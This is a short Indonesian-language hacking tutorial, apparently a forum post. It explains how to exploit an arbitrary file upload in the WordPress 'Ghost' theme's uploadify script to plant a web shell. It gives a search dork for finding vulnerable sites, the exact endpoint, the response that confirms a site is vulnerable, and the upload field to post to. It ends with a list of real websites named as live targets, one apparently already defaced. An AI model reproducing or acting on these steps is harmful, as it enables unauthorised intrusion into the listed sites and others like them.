langsung ae mank
1) dork: inurl:wp-content/themes/Ghost/
kembangin lagi pake otak wibu lo\
2) exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
3) Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}
4) buka csrf ( buka mak ) bisa juga pake csrf online
post di Filedata ~> inget post nya Filedata
5) sukses upload tinggal akses file
cara akses http://target.com/wp-content/uploads/settingsimages/ shell atau script kalian
kalo hoki kalian bisa dapet yang upload shell
http://www.juvankoski.com/wp-content/uploads/settingsimages/xxx.html
live target:
http://www.juvankoski.com/wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php
http://www.simseklerdugunsarayi.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
http://www.exconventosanhipolito.com/web/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
http://www.yannickderennes.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
http://www.theeasthills.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
sekian wassalamualaikum wr.wb
